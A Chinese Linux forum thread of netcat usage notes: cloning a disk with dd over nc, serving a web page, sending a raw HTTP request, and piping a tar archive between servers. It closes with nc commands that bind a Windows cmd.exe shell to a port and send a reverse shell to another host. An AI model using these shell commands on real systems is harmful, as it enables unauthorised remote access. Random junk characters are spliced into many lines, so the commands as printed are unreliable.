找回密码
 注册
楼主: admin

tcpdump 、nc的使用记录

[复制链接]

1

主题

0

回帖

12

积分

管理员

积分
12
QQ
 楼主| 发表于 2017-3-9 19:00:07 | 显示全部楼层
克隆硬盘或分区
  q) W: y! C+ [- d3 J操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。  a$ T# r. ?, Q" q5 t; Y  y4 S
克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:
' s5 ]/ z% A7 h. V* f/ L- T2 ?# nc -l -p 1234 | dd of=/dev/sda; }8 n' y6 C4 T: A5 r4 |' @4 S9 A4 D
1 G' j5 [' f2 T8 i  m' O* S3 x
server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:1 c8 B% `/ f" z- M0 A0 T
# dd if=/dev/sda | nc 192.168.228.222 1234. i1 P' U: c. A+ g

& I1 H/ u, U2 D4 h※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。

1

主题

0

回帖

12

积分

管理员

积分
12
QQ
 楼主| 发表于 2017-3-9 19:01:51 | 显示全部楼层
克隆硬盘或分区
$ [  l6 Q. e2 |, L操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。  N9 v3 J1 |7 c- [' p/ @9 \
克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:
- d) B0 J! C* m' C7 B# nc -l -p 1234 | dd of=/dev/sda
$ o& y  r* E  A! b: w" P  l 5 A! b+ n$ ]5 S4 F
server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:" b  \! P, I$ z& {
# dd if=/dev/sda | nc 192.168.228.222 1234. P9 g3 Y8 d4 I, `7 p/ I5 @: r
: q* k2 ^7 i* _' Z1 v
※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。

70

主题

73

回帖

1201

积分

网站编辑

积分
1201
发表于 2017-3-9 19:09:26 | 显示全部楼层
保存Web页面) X4 k9 l! C, [
# while true; do nc -l -p 80 -q 1 < somepage.html; done

70

主题

73

回帖

1201

积分

网站编辑

积分
1201
发表于 2017-3-9 19:12:51 | 显示全部楼层
模拟HTTP Headers,获取网页源代码和返回头部信息
7 o9 \6 j4 ?3 D' g8 x0 \
/ t5 q3 R* b% I7 p9 A[root@hatest1 ~]# nc www.linuxso.com 80" L- D' I9 u* Z2 o0 l3 f- ?
GET / HTTP/1.1
# f) _+ w! Z0 a' }* {& E7 {Host: ispconfig.org
  e0 v% A; j/ X: y, F- CReferrer: mypage.com
1 o" N, S: q* e" v- XUser-Agent: my-browser( J; J) k( N+ w7 y
! a0 v  u1 ^9 l0 v$ z
HTTP/1.1 200 OK
4 r( }- J5 \* `7 {7 VDate: Tue, 16 Dec 2008 07:23:24 GMT$ }- h5 Q: v/ @# K& g" I, A# N
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8# Z" ^8 m" L5 c" U  |) b8 k. g6 d
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/+ O% M- Q* C' L+ Z8 P
Expires: 0# I: Z/ t( l0 Q' m- }8 t* O/ O' ]
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=04 ]+ p2 w7 g4 O" A
Pragma: no-cache: C9 Q0 L0 a- k! Z( J/ G
Cache-Control: private, post-check=0, pre-check=0, max-age=0
6 J& J- j& P% [6 j' pSet-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/, F* i/ c6 |5 a& m
Vary: Accept-Encoding
7 r9 f1 @! r7 eTransfer-Encoding: chunked6 Q3 S" c) B; J' A, v
Content-Type: text/html
7 [4 [3 X3 D8 N* t; B[......]. u' r9 a+ ]( s+ l4 `
在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。+ ]( ?. D, _4 O# r! k( p6 n5 V
: _  P. m4 a' l1 |

5 D0 Z- d9 Z* T6 a; m: k+ e
4 |# V0 x1 C/ F( g4 {: ]4 W& ?  I传输目录
+ _9 `& @  g& K$ D从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上,用nc激活监听,server2上运行:& x  k- m1 M% z# W" E+ Y
引用+ g7 c: R3 b* k* e/ ]. J

, q" A* S& H& p% w: N% m1 M[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
; }7 s& M4 G4 I- Y0 }8 x: @server1上运行:: d# j1 N+ v* w9 o7 w( C; D
引用
3 u7 s/ r. W; P- p
) e% ~: U. s$ C[root@hatest1 ~]# ll -d nginx-0.6.34
/ [, s1 |: d# S, [  C6 bdrwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
( m2 f" E% U& l0 V[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 12345 M% ^% ?& U& l' J8 r- i" u

4 A' H/ L- s3 I& w( ?# m
$ \! C& H0 i% C( Y3 o
. J5 o! i+ C0 J* J! R6 @REMOTE主机绑定SHELL& t! ~  Q! S, b% A' d
例子:
2 u, V1 C3 |; K( Z" ]' @
& l5 M% S8 r, A5 x格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe/ ^  s2 E' o* s$ s. O8 l
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口: ?/ l" ?0 Q0 ?

  @; u! \% O3 V4 I
9 u# W: R0 j! n9 T7 T9 qREMOTE主机绑定SHELL并反向连接
, V4 x7 y# d3 ?5 Z+ R例子:1 C: W+ v- L' x1 x7 [+ m; q. v
3 w7 E7 E  x/ S1 T7 h+ ]
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354( A/ o$ B) X6 m( \8 _
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
8 |: i: Q: V4 C' W. S" H- n3 |以上为最基本的几种用法(其实NC的用法还有很多,
3 N5 @7 n6 \$ p, Q当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)6 M2 a  ]$ C+ C: `$ ]
您需要登录后才可以回帖 登录 | 注册

本版积分规则

返回首页|Archiver|手机版|小黑屋|易陆发现技术论坛 ( 蜀ICP备2026014127号-1 )

GMT+8, 2026-6-12 02:46 , Processed in 0.018382 second(s), 21 queries .

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表